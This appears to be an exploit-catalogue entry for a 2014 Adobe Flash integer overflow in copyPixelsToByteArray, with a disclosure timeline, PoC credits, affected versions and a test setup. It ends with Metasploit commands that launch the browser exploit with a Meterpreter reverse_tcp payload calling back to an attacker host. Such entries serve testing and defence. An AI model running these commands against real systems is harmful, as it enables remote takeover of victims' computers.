Timeline :
Vulnerability discovered by Chris Evans of Project Zero team at Google in 2014-07
Patched by the vendor via APSB14-21 the 2014–09-09
First public PoC provide by hdarwin on Packet Storm the 2014-09-30
Vulnerability reported integrated into exploit kits the 2014-10-20
Metasploit PoC provided the 2015-04-15
PoC provided by :
Chris Evans
Nicolas Joly
hdarwin
juan vazquez
Reference(s) :
Affected version(s) :
Adobe Flash Player 14.0.0.179 and earlier versions
Tested on :
with Adobe Flash Player 14.0.0.176 (flashplayer14_0r0_176_winax.exe) and Internet Explorer 8 on Windows 7 SP1
Description :
This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs in the copyPixelsToByteArray method from the BitmapData object. The position field of the destination ByteArray can be used to cause an integer overflow and write contents out of the ByteArray buffer. This module has been tested successfully on: * Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 14.0.0.176, 14.0.0.145, and 14.0.0.125. * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 14.0.0.179. * Windows 8.1, Firefox 38.0.5 and Adobe Flash 14.0.0.179.
Commands :
use exploit/windows/browser/adobe_flash_copy_pixels_to_byte_array set SRVHOST 192.168.6.138 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.6.138 run getuid sysinf